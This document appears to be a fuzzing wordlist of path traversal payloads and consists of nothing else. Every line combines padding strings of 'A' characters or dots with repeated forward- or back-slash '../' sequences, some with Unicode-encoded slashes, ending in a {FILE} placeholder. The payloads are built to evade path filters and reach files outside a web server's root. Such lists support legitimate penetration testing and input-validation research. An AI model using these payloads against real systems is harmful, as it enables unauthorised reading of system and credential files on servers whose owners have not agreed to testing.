AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}
/.../{FILE}
/.../.../{FILE}
/.../.../.../{FILE}
/.../.../.../.../{FILE}
/.../.../.../.../.../{FILE}
/.../.../.../.../.../.../{FILE}
/.../.../.../.../.../.../.../{FILE}
/.../.../.../.../.../.../.../.../{FILE}
/...\{FILE}
/...\...\{FILE}
/...\...\...\{FILE}
/...\...\...\...\{FILE}
/...\...\...\...\...\{FILE}
/...\...\...\...\...\...\{FILE}
/...\...\...\...\...\...\...\{FILE}
/...\...\...\...\...\...\...\...\{FILE}
/..../{FILE}
/..../..../{FILE}
/..../..../..../{FILE}
/..../..../..../..../{FILE}
/..../..../..../..../..../{FILE}
/..../..../..../..../..../..../{FILE}
/..../..../..../..../..../..../..../{FILE}
/..../..../..../..../..../..../..../..../{FILE}
/....\{FILE}
/....\....\{FILE}
/....\....\....\{FILE}
/....\....\....\....\{FILE}
/....\....\....\....\....\{FILE}
/....\....\....\....\....\....\{FILE}
/....\....\....\....\....\....\....\{FILE}
/....\....\....\....\....\....\....\....\{FILE}
/........................................................................../{FILE}
/........................................................................../../{FILE}
/........................................................................../../../{FILE}
/........................................................................../../../../{FILE}
/........................................................................../../../../../{FILE}
/........................................................................../../../../../../{FILE}
/........................................................................../../../../../../../{FILE}
/........................................................................../../../../../../../../{FILE}
/..........................................................................\{FILE}
/..........................................................................\..\{FILE}
/..........................................................................\..\..\{FILE}
/..........................................................................\..\..\..\{FILE}
/..........................................................................\..\..\..\..\{FILE}
/..........................................................................\..\..\..\..\..\{FILE}
/..........................................................................\..\..\..\..\..\..\{FILE}
/..........................................................................\..\..\..\..\..\..\..\{FILE}
/..%u2215{FILE}
/..%u2215..%u2215{FILE}
/..%u2215..%u2215..%u2215{FILE}
/..%u2215..%u2215..%u2215..%u2215{FILE}
